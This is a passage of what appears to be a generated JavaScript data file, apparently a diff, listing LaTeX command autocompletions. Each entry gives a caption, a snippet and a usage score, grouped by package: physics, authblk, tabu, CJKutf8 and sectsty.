caption: '\\expval{}', + snippet: '\\expval{$1}', + meta: 'physics-cmd', + score: 0.0006729185293892782, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'physics-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'physics-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\mqty', + snippet: '\\mqty', + meta: 'physics-cmd', + score: 0.0002048562866401335, + }, + { + caption: '\\order{}', + snippet: '\\order{$1}', + meta: 'physics-cmd', + score: 0.00019980403788140113, + }, + { + caption: '\\order', + snippet: '\\order', + meta: 'physics-cmd', + score: 0.00019980403788140113, + }, + { + caption: '\\abs{}', + snippet: '\\abs{$1}', + meta: 'physics-cmd', + score: 0.016268920166928613, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'physics-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'physics-cmd', 
+ score: 0.050370402546134785, + }, + { + caption: '\\dv{}{}', + snippet: '\\dv{$1}{$2}', + meta: 'physics-cmd', + score: 0.005139463745615663, + }, + { + caption: '\\dv[]{}{}', + snippet: '\\dv[$1]{$2}{$3}', + meta: 'physics-cmd', + score: 0.005139463745615663, + }, + { + caption: '\\eval{}', + snippet: '\\eval{$1}', + meta: 'physics-cmd', + score: 0.00021313621676565867, + }, + { + caption: '\\eval', + snippet: '\\eval', + meta: 'physics-cmd', + score: 0.00021313621676565867, + }, + { + caption: '\\eval[]{}', + snippet: '\\eval[$1]{$2}', + meta: 'physics-cmd', + score: 0.00021313621676565867, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'physics-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'physics-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ket{}', + snippet: '\\ket{$1}', + meta: 'physics-cmd', + score: 0.0326276280979336, + }, + { + caption: '\\mel{}{}{}', + snippet: '\\mel{$1}{$2}{$3}', + meta: 'physics-cmd', + score: 0.001123156900573353, + }, + { + caption: '\\ip', + snippet: '\\ip', + meta: 'physics-cmd', + score: 0.0008534664860896849, + }, + { + caption: '\\ip{}{}', + snippet: '\\ip{$1}{$2}', + meta: 'physics-cmd', + score: 0.0008534664860896849, + }, + { + caption: '\\ip[]{}', + snippet: '\\ip[$1]{$2}', + meta: 'physics-cmd', + score: 0.0008534664860896849, + }, + { + caption: '\\Im', + snippet: '\\Im', + meta: 'physics-cmd', + score: 0.0013451768070134808, + }, + { + caption: '\\Im{}', + snippet: '\\Im{$1}', + meta: 'physics-cmd', + score: 0.0013451768070134808, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'physics-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'physics-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\comm{}{}', + snippet: '\\comm{$1}{$2}', + meta: 'physics-cmd', + score: 0.0012026610554672049, + }, + { + caption: '\\qty', + snippet: '\\qty', + meta: 'physics-cmd', + score: 0.0017737618641299655, + }, + { + caption: '\\qty{}', + snippet: '\\qty{$1}', + meta: 'physics-cmd', + score: 0.0017737618641299655, + }, + { + caption: '\\Tr', + snippet: '\\Tr', + meta: 'physics-cmd', + score: 0.004615158124783136, + }, + { + caption: '\\Tr{}', + snippet: '\\Tr{$1}', + meta: 'physics-cmd', + score: 0.004615158124783136, + }, + { + caption: '\\bra{}', + snippet: '\\bra{$1}', + meta: 'physics-cmd', + score: 0.005609763332417241, + }, + { + caption: '\\poissonbracket{}{}', + snippet: '\\poissonbracket{$1}{$2}', + meta: 'physics-cmd', + score: 2.2761809626681494e-5, + }, + { + caption: '\\pmat{}', + snippet: '\\pmat{$1}', + meta: 'physics-cmd', + score: 0.00010356789132354732, + }, + { + caption: '\\norm{}', + snippet: '\\norm{$1}', + meta: 'physics-cmd', + score: 0.006576610603906938, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'physics-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'physics-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cross', + snippet: '\\cross', + meta: 'physics-cmd', + score: 0.0005412940211650938, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'physics-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\dmat{}', + snippet: '\\dmat{$1}', + meta: 'physics-cmd', + score: 2.2761809626681494e-5, + }, + { + caption: '\\Re', + snippet: '\\Re', + meta: 'physics-cmd', + score: 0.0031525922563281736, + }, + { + caption: '\\Re{}', + snippet: '\\Re{$1}', + meta: 'physics-cmd', + score: 0.0031525922563281736, + 
}, + { + caption: '\\qq{}', + snippet: '\\qq{$1}', + meta: 'physics-cmd', + score: 8.241282620919185e-5, + }, + { + caption: '\\qq', + snippet: '\\qq', + meta: 'physics-cmd', + score: 8.241282620919185e-5, + }, + { + caption: '\\vb{}', + snippet: '\\vb{$1}', + meta: 'physics-cmd', + score: 0.007377410801695042, + }, + { + caption: '\\pdv{}{}', + snippet: '\\pdv{$1}{$2}', + meta: 'physics-cmd', + score: 0.0014087913646471247, + }, + { + caption: '\\pdv{}{}{}', + snippet: '\\pdv{$1}{$2}{$3}', + meta: 'physics-cmd', + score: 0.0014087913646471247, + }, + { + caption: '\\braket{}{}', + snippet: '\\braket{$1}{$2}', + meta: 'physics-cmd', + score: 0.004421747491186916, + }, + { + caption: '\\braket{}', + snippet: '\\braket{$1}', + meta: 'physics-cmd', + score: 0.004421747491186916, + }, + { + caption: '\\div', + snippet: '\\div', + meta: 'physics-cmd', + score: 0.002403050103349905, + }, + { + caption: '\\div{}', + snippet: '\\div{$1}', + meta: 'physics-cmd', + score: 0.002403050103349905, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'physics-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'physics-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'physics-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'physics-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'physics-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'physics-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'physics-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'physics-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'physics-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'physics-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'physics-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'physics-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'physics-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'physics-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'physics-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'physics-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'physics-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'physics-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'physics-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'physics-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'physics-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'physics-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 
'physics-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'physics-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'physics-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'physics-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'physics-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'physics-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'physics-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'physics-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'physics-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'physics-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'physics-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'physics-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'physics-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'physics-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'physics-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'physics-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'physics-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'physics-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'physics-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'physics-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'physics-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'physics-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'physics-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'physics-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'physics-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'physics-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'physics-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'physics-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'physics-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'physics-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'physics-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 
'physics-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'physics-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'physics-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'physics-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'physics-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'physics-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'physics-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'physics-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'physics-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'physics-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'physics-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'physics-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'physics-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'physics-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'physics-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'physics-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'physics-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'physics-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'physics-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'physics-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'physics-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'physics-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'physics-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'physics-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'physics-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'physics-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'physics-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'physics-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'physics-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'physics-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'physics-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'physics-cmd', + score: 
0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'physics-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'physics-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'physics-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'physics-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'physics-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'physics-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'physics-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'physics-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'physics-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'physics-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'physics-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'physics-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'physics-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'physics-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'physics-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'physics-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'physics-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'physics-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'physics-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'physics-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'physics-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'physics-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'physics-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'physics-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'physics-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'physics-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'physics-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'physics-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'physics-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'physics-cmd', + score: 
0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'physics-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'physics-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'physics-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'physics-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'physics-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'physics-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'physics-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'physics-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'physics-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'physics-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'physics-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'physics-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'physics-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'physics-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'physics-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'physics-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'physics-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'physics-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'physics-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'physics-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'physics-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'physics-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'physics-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'physics-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'physics-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'physics-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'physics-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'physics-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'physics-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'physics-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'physics-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'physics-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'physics-cmd', + score: 0.010227440663206161, + }, + 
{ + caption: '\\tanh', + snippet: '\\tanh', + meta: 'physics-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'physics-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'physics-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'physics-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'physics-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'physics-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'physics-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'physics-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'physics-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'physics-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'physics-cmd', + score: 0.0063276692758974925, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'physics-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'physics-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'physics-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'physics-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'physics-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'physics-cmd', + score: 0.2864294797053033, + }, + ], + authblk: [ + { + caption: '\\Authfont{}', + snippet: '\\Authfont{$1}', + meta: 'authblk-cmd', + score: 0.00019538157043798684, + }, + { + caption: '\\thanks{}', + snippet: '\\thanks{$1}', + meta: 'authblk-cmd', + score: 0.08382259880654083, + }, + { + caption: '\\maketitle', + snippet: '\\maketitle', + meta: 'authblk-cmd', + score: 0.7504160124360846, + }, + { + caption: '\\rlap{}', + snippet: '\\rlap{$1}', + meta: 'authblk-cmd', + score: 0.01269300721396509, + }, + { + caption: '\\Authands{}', + snippet: '\\Authands{$1}', + meta: 'authblk-cmd', + score: 0.00043932814970131613, + }, + { + caption: '\\author{}', + snippet: '\\author{$1}', + meta: 'authblk-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\author[]{}', + snippet: '\\author[$1]{$2}', + meta: 'authblk-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\textsuperscript{}', + snippet: '\\textsuperscript{$1}', + meta: 'authblk-cmd', + score: 0.05216393882408519, + }, + { + caption: '\\Affilfont{}', + snippet: '\\Affilfont{$1}', + meta: 'authblk-cmd', + score: 0.0004505484831792931, + }, + { + caption: '\\footnote{}', + snippet: '\\footnote{$1}', + meta: 'authblk-cmd', + score: 0.2253056071787701, + }, + { + caption: '\\affil[]{}', + snippet: '\\affil[$1]{$2}', + meta: 'authblk-cmd', + score: 0.014174618039587864, + }, + { + caption: '\\affil{}', + snippet: '\\affil{$1}', + meta: 'authblk-cmd', + score: 0.014174618039587864, + }, + ], + tabu: [ + { + caption: '\\extrarowheight', + snippet: '\\extrarowheight', + meta: 'tabu-cmd', + score: 0.003735645243417412, + }, + { + caption: '\\extrarowheight{}', 
+ snippet: '\\extrarowheight{$1}', + meta: 'tabu-cmd', + score: 0.003735645243417412, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'tabu-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'tabu-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\hfill', + snippet: '\\hfill', + meta: 'tabu-cmd', + score: 0.2058248088519886, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'tabu-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'tabu-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\tabulinesep', + snippet: '\\tabulinesep', + meta: 'tabu-cmd', + score: 0.0008256968285249214, + }, + { + caption: '\\hskip', + snippet: '\\hskip', + meta: 'tabu-cmd', + score: 0.04339822811565144, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'tabu-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'tabu-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'tabu-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'tabu-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'tabu-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tabu-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'tabu-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'tabu-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\par', + snippet: '\\par', + meta: 'tabu-cmd', + score: 0.413853376001159, + }, + ], + CJKutf8: [ + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'CJKutf8-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'CJKutf8-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'CJKutf8-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\selectfont', + snippet: '\\selectfont', + meta: 'CJKutf8-cmd', + score: 0.04598628699063736, + }, + { + caption: '\\inputencoding{}', + snippet: '\\inputencoding{$1}', + meta: 'CJKutf8-cmd', + score: 0.0002447047447770061, + }, + ], + sectsty: [ + { + caption: '\\chapterfont{}', + snippet: '\\chapterfont{$1}', + meta: 'sectsty-cmd', + score: 0.0001572081344977262, + }, + { + caption: '\\raggedright', + snippet: '\\raggedright', + meta: 'sectsty-cmd', + score: 